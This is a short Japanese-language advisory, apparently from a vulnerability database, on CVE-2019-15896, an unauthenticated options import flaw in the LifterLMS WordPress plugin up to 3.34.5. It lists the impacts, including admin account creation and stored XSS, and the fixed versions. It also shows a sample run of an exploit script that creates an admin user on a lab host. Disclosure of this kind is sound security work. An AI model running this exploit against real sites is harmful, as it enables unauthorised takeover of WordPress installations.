
LifterLMS <= 3.34.5 - 未認証のオプションインポート
LifterLMS <= 3.34.5 - 未認証のオプションインポート
未認証のオプションインポート。これにより、次のような結果を引き起こす可能性があります。
ウェブサイトのリダイレクト
管理者アカウントの作成
コンテンツの注入
保存型XSS
これらの問題は 3.35.0 で修正されたと報告されています。ただし、v3.35.1 で追加の入力サニタイズとフィルタリングが追加されました。
$ python3 CVE-2019-15896.py --url http://wordpress.lan --username radmin --email [email protected]
LifterLMS <= 3.34.5 - Unauthenticated Options Import
Exploit By Ramdom Robbie
Once ran check your email for the forgotten password link.
Password reset email sent to [email protected]
Requires access to login.php and working email address and the site needs to be able to send emails